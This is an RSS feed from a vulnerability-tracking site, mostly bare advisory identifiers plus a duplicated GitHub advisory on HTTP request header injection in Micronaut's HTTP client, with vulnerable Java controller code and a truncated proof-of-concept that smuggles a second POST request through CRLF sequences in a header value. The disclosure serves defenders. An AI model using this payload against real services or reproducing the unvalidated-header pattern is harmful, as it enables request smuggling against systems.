<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 04:07:29 +0000</lastBuildDate>
    <item>
      <title>cnvd-2020-37908</title>
      <link>https://cve.radiocsirt.org/vuln/cnvd-2020-37908</link>
      <description>cnvd-2020-37908</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cnvd-2020-37908</guid>
    </item>
    <item>
      <title>EUVD-2026-38040</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-38040</link>
      <description>EUVD-2026-38040</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-38040</guid>
    </item>
    <item>
      <title>fkie_cve-2020-7611</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2020-7611</link>
      <description>&lt;p&gt;All versions of io.micronaut:micronaut-http-client before 1.2.11 and all versions from 1.3.0 before 1.3.2 are vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;All versions of io.micronaut:micronaut-http-client before 1.2.11 and all versions from 1.3.0 before 1.3.2 are vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2020-7611</guid>
    </item>
    <item>
      <title>GHSA-694p-xrhg-x3wm — Micronaut's HTTP client is vulnerable to HTTP Request Header Injection</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-694p-xrhg-x3wm</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: io.micronaut:micronaut-http-client&lt;/p&gt;
&lt;p&gt;### Vulnerability&lt;/p&gt;
&lt;p&gt;Micronaut&amp;#39;s HTTP client is vulnerable to &amp;#34;HTTP Request Header Injection&amp;#34; due to not validating request headers passed to the client.&lt;/p&gt;
&lt;p&gt;Example of vulnerable code:&lt;/p&gt;
&lt;p&gt;```java
@Controller(&amp;#34;/hello&amp;#34;)
public class HelloController {&lt;/p&gt;
&lt;p&gt;@Inject
    @Client(&amp;#34;/&amp;#34;)
    RxHttpClient client;&lt;/p&gt;
&lt;p&gt;@Get(&amp;#34;/external-exploit&amp;#34;)
    @Produces(MediaType.TEXT_PLAIN)
    public String externalExploit(@QueryValue(&amp;#34;header-value&amp;#34;) String headerValue) {
        return client.toBlocking().retrieve(
            HttpRequest.GET(&amp;#34;/hello&amp;#34;)
                .header(&amp;#34;Test&amp;#34;, headerValue)
        );
    }
}
```&lt;/p&gt;
&lt;p&gt;In the above case a query value received from a user is passed as a header value to the client. Since the client doesn&amp;#39;t validate the header value the request headers and body have the potential to be manipulated.&lt;/p&gt;
&lt;p&gt;For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.&lt;/p&gt;
&lt;p&gt;```java
List&amp;lt;String&amp;gt; headerData = List.of(
    &amp;#34;Connection: Keep-Alive&amp;#34;, // This keeps the connection open so another request can be stuffed in.
    &amp;#34;&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;POST /hello/super-secret HTTP/1.1&amp;#34;,
    &amp;#34;Host: 127.0.0.1&amp;#34;,
    &amp;#34;Content-Length: 31&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;{\&amp;#34;new\&amp;#34;:\&amp;#34;json\&amp;#34;,\&amp;#34;content\&amp;#34;:\&amp;#34;here\&amp;#34;}&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;&amp;#34;
);
String headerValue = &amp;#34;H\r\n&amp;#34; + String.join(&amp;#34;\r\n&amp;#34;, headerData);;
URI theURI =
    UriBuilder
        .of(&amp;#34;/hello/external-exploit&amp;#34;)
        .queryParam(&amp;#34;header-value&amp;#34;, headerValue) // Automatically URL encodes data
        .buil…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: io.micronaut:micronaut-http-client&lt;/p&gt;
&lt;p&gt;### Vulnerability&lt;/p&gt;
&lt;p&gt;Micronaut&amp;#39;s HTTP client is vulnerable to &amp;#34;HTTP Request Header Injection&amp;#34; due to not validating request headers passed to the client.&lt;/p&gt;
&lt;p&gt;Example of vulnerable code:&lt;/p&gt;
&lt;p&gt;```java
@Controller(&amp;#34;/hello&amp;#34;)
public class HelloController {&lt;/p&gt;
&lt;p&gt;@Inject
    @Client(&amp;#34;/&amp;#34;)
    RxHttpClient client;&lt;/p&gt;
&lt;p&gt;@Get(&amp;#34;/external-exploit&amp;#34;)
    @Produces(MediaType.TEXT_PLAIN)
    public String externalExploit(@QueryValue(&amp;#34;header-value&amp;#34;) String headerValue) {
        return client.toBlocking().retrieve(
            HttpRequest.GET(&amp;#34;/hello&amp;#34;)
                .header(&amp;#34;Test&amp;#34;, headerValue)
        );
    }
}
```&lt;/p&gt;
&lt;p&gt;In the above case a query value received from a user is passed as a header value to the client. Since the client doesn&amp;#39;t validate the header value the request headers and body have the potential to be manipulated.&lt;/p&gt;
&lt;p&gt;For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.&lt;/p&gt;
&lt;p&gt;```java
List&amp;lt;String&amp;gt; headerData = List.of(
    &amp;#34;Connection: Keep-Alive&amp;#34;, // This keeps the connection open so another request can be stuffed in.
    &amp;#34;&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;POST /hello/super-secret HTTP/1.1&amp;#34;,
    &amp;#34;Host: 127.0.0.1&amp;#34;,
    &amp;#34;Content-Length: 31&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;{\&amp;#34;new\&amp;#34;:\&amp;#34;json\&amp;#34;,\&amp;#34;content\&amp;#34;:\&amp;#34;here\&amp;#34;}&amp;#34;,
    &amp;#34;&amp;#34;,
    &amp;#34;&amp;#34;
);
String headerValue = &amp;#34;H\r\n&amp;#34; + String.join(&amp;#34;\r\n&amp;#34;, headerData);;
URI theURI =
    UriBuilder
        .of(&amp;#34;/hello/external-exploit&amp;#34;)
        .queryParam(&amp;#34;header-value&amp;#34;, headerValue) // Automatically URL encodes data
        .buil…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-694p-xrhg-x3wm</guid>
    </item>
    <item>
      <title>gsd-2020-7611</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2020-7611</link>
      <description>gsd-2020-7611</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2020-7611</guid>
    </item>
  </channel>
</rss>
